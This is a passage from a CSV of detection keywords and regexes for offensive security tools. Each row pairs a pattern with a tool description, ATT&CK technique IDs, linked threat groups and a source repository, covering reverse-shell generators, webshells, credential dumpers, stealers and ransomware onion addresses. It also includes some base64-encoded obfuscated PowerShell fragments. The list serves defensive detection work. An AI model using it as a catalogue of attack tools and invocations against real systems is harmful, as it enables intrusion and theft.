Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","50025" "*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","50026" "*java -jar chunk-Proxy.jar java 1088 http://10.10.10.1:8080/proxy.jsp*",".{0,1000}java\s\-jar\schunk\-Proxy\.jar\sjava\s1088\shttp\:\/\/10\.10\.10\.1\:8080\/proxy\.jsp.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#content","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","50027" "*java -jar sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - 
T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50028" "*java -jar sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50029" "*java/jndi/LDAPRefServer.java*",".{0,1000}java\/jndi\/LDAPRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","50030" "*java/jsp_shell_reverse_tcp*",".{0,1000}java\/jsp_shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","50031" "*java/shell_reverse_tcp*",".{0,1000}java\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","50032" "*java-deserialization-exploits*",".{0,1000}java\-deserialization\-exploits.{0,1000}","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","N/A","6","593","219","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z","50033" "*javascript-obfuscator*",".{0,1000}javascript\-obfuscator.{0,1000}","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","N/A","10","14658","1602","2024-07-01T21:42:13Z","2016-05-09T08:16:53Z","50034" "*java-socks-proxy-server.jar*",".{0,1000}java\-socks\-proxy\-server\.jar.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","50035" "*jbdg4buq6jd7ed3rd6cynqtq5abttuekjnxqrqyvk4xam5i7ld33jvqd.onion*",".{0,1000}jbdg4buq6jd7ed3rd6cynqtq5abttuekjnxqrqyvk4xam5i7ld33jvqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50036" "*jbeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.onion*",".{0,1000}jbeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50037" "*jblndlipeogpafnldhgmapagcccfchpi*",".{0,1000}jblndlipeogpafnldhgmapagcccfchpi.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50038" "*jboss_jmx_upload_exploit*",".{0,1000}jboss_jmx_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50040" "*jdk*-activator-rce-test.txt*",".{0,1000}jdk.{0,1000}\-activator\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50042" "*jdk*-call-rce-test.txt*",".{0,1000}jdk.{0,1000}\-call\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50043" "*jdk*-dgc-rce-test.txt*",".{0,1000}jdk.{0,1000}\-dgc\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50044" 
"*jdk*-method-rce-test.txt*",".{0,1000}jdk.{0,1000}\-method\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50045" "*jdk*-reg-bypass.txt*",".{0,1000}jdk.{0,1000}\-reg\-bypass\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50046" "*jdwp-shellifier.py -t * -p * --cmd *",".{0,1000}jdwp\-shellifier\.py\s\-t\s.{0,1000}\s\-p\s.{0,1000}\s\-\-cmd\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50047" "*Jecretz, Jira Secrets Hunter*",".{0,1000}Jecretz,\sJira\sSecrets\sHunter.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered 
Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","50048" "*jeffhacks/smbscan*",".{0,1000}jeffhacks\/smbscan.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","1","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","50050" "*jfjallid/go-lsass*",".{0,1000}jfjallid\/go\-lsass.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","50052" "*jfjallid/go-secdump*",".{0,1000}jfjallid\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","50053" "*JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw==*",".{0,1000}JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50054" 
"*JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB*",".{0,1000}JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","50055" "*JGillam/burp-co2*",".{0,1000}JGillam\/burp\-co2.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","50057" "*JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl*",".{0,1000}JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","50058" "*JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ==*",".{0,1000}JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ\=\=.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - 
TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","50059" "*jianingy/proxychains*",".{0,1000}jianingy\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","50060" "*Jira-Lens.py*",".{0,1000}Jira\-Lens\.py.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","50061" "*jmarr73/NTLMSleuth*",".{0,1000}jmarr73\/NTLMSleuth.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","50064" "*jmmcatee/cracklord*",".{0,1000}jmmcatee\/cracklord.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","50065" "*JMousqueton/PoC-CVE-2022-30190*",".{0,1000}JMousqueton\/PoC\-CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","POC 
CVE-2022-30190 CVE 0-day MS Office RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","N/A","2","157","55","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z","50066" "*jmp_hijack_thread(*",".{0,1000}jmp_hijack_thread\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","50067" "*jndi_injection.rb*",".{0,1000}jndi_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50068" "*JNDI-Injection-Exploit*",".{0,1000}JNDI\-Injection\-Exploit.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","50069" "*joaoviictorti/RustRedOps*",".{0,1000}joaoviictorti\/RustRedOps.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","50070" "*JOB COMPLETE: GO GET YOUR LOOT!*",".{0,1000}JOB\sCOMPLETE\:\sGO\sGET\sYOUR\sLOOT!.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - 
T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","50071" "*Job killed and console drained*",".{0,1000}Job\skilled\sand\sconsole\sdrained.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","50072" 
"*Joe1sn/S-inject*",".{0,1000}Joe1sn\/S\-inject.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","50073" "*JoelGMSec - https://darkbyte.net*",".{0,1000}JoelGMSec\s\-\shttps\:\/\/darkbyte\.net.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50074" "*JoelGMSec/EvilnoVNC*",".{0,1000}JoelGMSec\/EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50075" "*JoelGMSec/HTTP-Shell*",".{0,1000}JoelGMSec\/HTTP\-Shell.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","50076" "*JoelGMSec/Invoke-Stealth*",".{0,1000}JoelGMSec\/Invoke\-Stealth.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","50077" "*JoelGMSec/PSAsyncShell*",".{0,1000}JoelGMSec\/PSAsyncShell.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - 
T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","50078" "*JoelGMSec/PSRansom*",".{0,1000}JoelGMSec\/PSRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","50079" "*Joey is the best hacker in Hackers*",".{0,1000}Joey\sis\sthe\sbest\shacker\sin\sHackers.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50081" "*john * --incremental*",".{0,1000}john\s.{0,1000}\s\-\-incremental.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50082" "*john * -w=*",".{0,1000}john\s.{0,1000}\s\-w\=.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50083" "*john * --wordlist=*",".{0,1000}john\s.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50084" "*john *-groups*",".{0,1000}john\s.{0,1000}\-groups.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50085" "*john *htdigest*",".{0,1000}john\s.{0,1000}htdigest.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 